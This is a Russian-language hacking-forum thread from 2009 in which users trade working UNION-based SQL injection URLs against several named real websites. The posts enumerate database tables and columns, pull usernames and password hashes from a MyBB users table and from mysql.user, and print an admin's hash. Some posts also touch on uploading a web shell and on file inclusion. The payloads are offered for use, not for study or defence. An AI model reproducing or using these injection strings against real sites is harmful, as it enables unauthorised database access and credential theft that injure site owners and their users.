31.01.2009, 12:33
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от Assembler
вывел таблицы через Group_concat но они не все выводяться,
А где написано, что они должны все выводиться?
а лимит работает но как то странно допустим при 15,1 дает VIeus а через минуту при 15,1 выдает ошибку, так до конца и не могу добраться, подскажите кто нить в чем проблема...
Да, иногда ошибку даёт, не в лимите дело, он и без него иногда ничего не выводит. Но в любом случае вывести можно, там 346 таблиц, несколько раз делай запрос , до вывода, других способов всё равно нет
|
|
|
31.01.2009, 12:40
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от jokester
А где написано, что они должны все выводиться?
Да, иногда ошибку даёт, не в лимите дело, он и без него иногда ничего не выводит. Но в любом случае вывести можно, там 346 таблиц, несколько раз делай запрос , до вывода, других способов всё равно нет
https://forum.antichat.ru/showpost.php?p=1075672&postcount=4940
Есть еще знак > и < и т.д. Лимит не везде доступен при скулях
|
|
|
|
31.01.2009, 13:10
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Pashkela Не понял. Ты отвечал на какой-то мой вопрос?
Если на этот --> А где написано, что они должны все выводиться?
То ответа по ссылке на нашол, да и не стоит беспокоится, вопрос риторический 
Насчёт лимита:
Там работает лимит, просто скрипт глючит иногда.
|
|
|
|
31.01.2009, 14:23
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами:
10227206
Репутация:
2163
|
|
как это у вас проходят конструкции group_concat+limit, я думал функции с аргументами выборки не дружат с лимитом,
на вашем же примере если задавать начальные позиции <>0
http://www.wowpourlesnuls.fr/images.php?img=-1+union+select+1,count(table_name)+from+informatio n_schema.tables+limit+1,1--
http://www.wowpourlesnuls.fr/images.php?img=-1+union+select+1,group_concat(table_name)+from+inf ormation_schema.tables+limit+1,1--
http://www.wowpourlesnuls.fr/images.php?img=-1+union+select+1,ascii(table_name)+from+informatio n_schema.tables+limit+1,1--
вот ещё 1 пример, вывод есть:
http://mskputana.ru/list.php?foto=p44512_3.jpg&link=-1+union+select+group_concat(table_name),2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43+from+information_schema.tables+limit+0,1--+
вывода нет
http://mskputana.ru/list.php?foto=p44512_3.jpg&link=-1+union+select+group_concat(table_name),2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43+from+information_schema.tables+limit+1,1--+
и чем вас не устраивает вариант group_concat(user order by 'user') where user>'user' ? '( |
|
|
|
31.01.2009, 14:45
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от l1ght
как это у вас проходят конструкции group_concat+limit, я думал функции с аргументами выборки не дружат с лимитом
Какой ещё group_concat+limit? Лично я говорил про лимит отдельно, груп конкат отдельно. Возможно не достаточно понятно выразился, извиняйте.
Сообщение от l1ght
и чем вас не устраивает вариант group_concat(user order by 'user') where user>'user' ? '(
Я тебе уже говорил, что подзапросы и условия-- это не наш метод, нам нужна кнопка "Залить шелл" 
===========================
add: кстати о проститутках, их можно группировать Например так(разбиваем по базам):
http://mskputana.ru/list.php?foto=p44512_3.jpg&link=-1+union+select+group_concat(table_name),2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43+from+information_schema.tables+group+by+ta ble_schema+limit+2,1--+
При таком раскладе лимит ,разумеется, работает отлично
Ну а не на information_schema, тоже можно групировать по полю, админов там всех вывести и т.д
Типо:
-1+union+select+group_concat(concat_ws(0x2f,user,pa ssword,file_priv)),2,3,4,5,6+from+mysql.user+group +by+file_priv+limit+1,1
Ну и т.д., тоже конечно не панацея, но как вариант покатит
Последний раз редактировалось jokester; 31.01.2009 в 15:40..
|
|
|
|
31.01.2009, 18:03
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
С нами:
9610769
Репутация:
380
|
|
У меня такой вопрос, подобрал например в скуле количество выводимых полей, конструкция такого типа выводит данные -1+group+by+1, но как только делаю union даные не выводятся, вот сылка
Код HTML:
http://www2.cali.org/index.php?fuseaction=conference.ViewAgenda&eventid=-1+union+select+1,2,3,@@version,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*
Как я понял нужно делать через сабгверю? |
|
|
|
31.01.2009, 12:36
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от Assembler
http://www.wowpourlesnuls.fr/images.php?img=-1%20union%20select%201,group_concat(table_name)%20 from%20information_schema.tables%20%20--
Помогите плиз, вобщем вывел таблицы через Group_concat но они не все выводяться, а лимит работает но как то странно допустим при 15,1 дает VIeus а через минуту при 15,1 выдает ошибку, так до конца и не могу добраться, подскажите кто нить в чем проблема...
Зачем через group_concat? Делай просто через limit по одному.
http://www.rapidshare.ru/909903 - вот тебе список всех таблиц! Самые полезные: user и mybb_users
http://www.wowpourlesnuls.fr/images.php?img=-1+union+select+1,column_name+from+information_sche ma.columns+where+table_name=0x75736572++-- это колонки таблицы user
http://www.wowpourlesnuls.fr/images.php?img=-1+union+select+1,column_name+from+information_sche ma.columns+where+table_name=0x6d7962625f7573657273 ++-- колонки таблицы mybb_users
http://www.wowpourlesnuls.fr/images.php?img=-1+union+select+1,concat_ws(0x3a,uid,username,passw ord)+from+mybb_users--
1:Admin:5d3fd0aa8e2c38d1b632a1a2d09f46dd - вот логин и пароль из таблицы mybb_users
Последний раз редактировалось Tigger; 31.01.2009 в 13:00..
|
|
|
|
31.01.2009, 19:07
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Велемир ты разницу между заливкой и инклудом видишь?
При инклуде расширение не играет роли, любой файл можно включить и он обработается Tigger прав.
|
|
|
|
31.01.2009, 19:13
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Желательно именно *.txt, потому что не всегда можно *.php заливать
|
|
|
|
31.01.2009, 19:26
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Видимо нет =\
http://php.su/functions/?include
http://php.su/functions/?require
Это не заливка, а ВКЛЮЧЕНИЕ
|
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Комбинированный вид
